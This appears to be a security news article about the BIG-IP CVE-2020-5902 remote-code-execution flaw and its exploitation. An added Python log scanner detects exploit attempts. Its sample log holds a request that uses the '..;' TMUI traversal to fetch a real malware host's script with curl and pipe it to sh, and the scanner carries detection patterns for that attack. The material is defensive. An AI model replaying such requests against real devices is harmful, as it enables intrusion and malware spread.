Last week we wrote about an extremely dangerous RCE vulnerability that has been fixed in the configuration interface (TMUI) of the popular BIG-IP application delivery controller. The bug was discovered by Positive Technologies experts, received the identifier CVE-2020-5902, and scored 10 out of 10 on the CVSSv3 scale, which corresponds to the highest severity level.
By exploiting the bug, a remote attacker can execute arbitrary commands without authentication and completely compromise the system, for example intercepting the traffic of the web resources that the controller fronts.
Positive Technologies analysts wrote that, as of the end of June 2020, more than 8,000 vulnerable devices were reachable from the Internet worldwide: 40% of them in the USA, 16% in China, 3% in Taiwan, and 2.5% each in Canada and Indonesia. Fewer than 1% of the vulnerable devices were found in Russia. F5 engineers have already released fixes, and organizations were advised to install them immediately.
Security researchers noted that in scale this problem closely resembles the RCE vulnerabilities in Pulse Secure VPN and Citrix network gateways. Such bugs are very popular with cybercriminals, who typically use them to gain a foothold in corporate networks and then deploy backdoors, steal confidential files, or run ransomware. Hacking groups such as REvil, Maze and Netwalker often rely on vulnerabilities of this kind, which lets them compromise some of the largest companies in the world.
A few days ago experts warned that PoC exploits for the problem were already available and that attacks on the vulnerability had begun. Exploits and technical details were published shortly after the vulnerability itself was disclosed, and researchers noted that the entire exploit fits in a single tweet.
Now Bad Packets experts estimate that approximately 635 unique network providers still host vulnerable BIG-IP endpoints, among them government organizations, educational institutions, healthcare providers, and financial companies from the Fortune 500 list.
Whereas attackers previously only scanned for vulnerable systems and tried to extract passwords from them, Bad Packets analysts now report attacks on CVE-2020-5902 aimed at spreading DDoS malware, with the activity coming from IP addresses previously implicated in other malicious activity.
Active DDoS malware payload detected:
http://panel.devilsden[.]net/iot.sh
Exploit attempt source IP: 22.214.171.124 (🇷🇴)
– Bad Packets (@bad_packets) July 6, 2020
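A practitioner reading the tweet above will want to know whether their own BIG-IP has seen this activity. The following script is an added example and is not from the article, from Bad Packets, or from F5: it walks Apache-format access log lines (the format BIG-IP writes to /var/log/httpd/httpd_access_log) and flags three things: requests whose decoded URI carries the `..;` path-segment trick against /tmui/, which is the traversal that F5's published LocationMatch mitigation for CVE-2020-5902 blocks and is not described in the article itself; requests that reference the payload host quoted in the tweet; and requests from the source IP the tweet lists. The log lines, the `/tmui/run.jsp` endpoint and the `cmd=` parameter in them are constructed for illustration and are not real captures or real BIG-IP endpoints.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample lines (not real captures) in the Apache combined format.
# Line 2 is a scanner probing with a URL-encoded "..;", line 3 is a hypothetical
# exploitation attempt fetching the payload host named in the Bad Packets tweet.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Jul/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Jul/2020:10:02:13 +0000] "GET /tmui/login.jsp/..%3B/tmui/locallb/ HTTP/1.1" 404 311 "-" "python-requests/2.23"
22.214.171.124 - - [06/Jul/2020:10:05:44 +0000] "GET /tmui/login.jsp/..;/tmui/run.jsp?cmd=curl+-s+http://panel.devilsden.net/iot.sh+%7C+sh HTTP/1.1" 200 87 "-" "curl/7.64.1"
203.0.113.9 - - [06/Jul/2020:10:07:02 +0000] "POST /tmui/login.jsp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, ident, user, [timestamp], "METHOD URI PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator 1: "..;" anywhere after a /tmui/ path segment. Matched on the
# URL-decoded URI so that "%3B" and other encodings do not evade the check.
TRAVERSAL_RE = re.compile(r'/tmui/.*\.\.;', re.IGNORECASE)

# Indicator 2: the payload distribution host quoted (defanged) in the tweet.
MALWARE_HOST = "panel.devilsden.net"

# Indicator 3: the exploit source IP listed in the tweet. In production this
# would be a threat-intel feed rather than a hard-coded set.
KNOWN_BAD_IPS = {"22.214.171.124"}


@dataclass
class Finding:
    ip: str
    timestamp: str
    uri: str          # decoded request URI
    reasons: list     # human-readable indicators that fired


def classify(line: str):
    """Return a Finding for a suspicious access-log line, or None if benign/unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = unquote(m.group("uri"))
    reasons = []
    if TRAVERSAL_RE.search(uri):
        reasons.append("tmui path traversal (..;)")
    if MALWARE_HOST in uri.lower():
        reasons.append(f"references {MALWARE_HOST}")
    if m.group("ip") in KNOWN_BAD_IPS:
        reasons.append("source IP on watchlist")
    if not reasons:
        return None
    return Finding(m.group("ip"), m.group("ts"), uri, reasons)


def scan_log(text: str) -> list:
    """Classify every line of an access log and keep only the suspicious ones."""
    return [f for f in (classify(line) for line in text.splitlines()) if f]


def attackers(findings: list) -> list:
    """Sorted, de-duplicated source IPs for blocking or further triage."""
    return sorted({f.ip for f in findings})


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.ip} {f.uri}\n    -> {', '.join(f.reasons)}")
    print("sources:", attackers(scan_log(SAMPLE_LOG)))
```

Note that the traversal check fires on the probe with the 404 response as well as on the successful request: a scanner hitting a patched device still tells you who is looking for you, and the status code tells you whether the request got through. A host name in a query string is only a weak indicator on its own, which is why the script reports every indicator that fired rather than a single verdict.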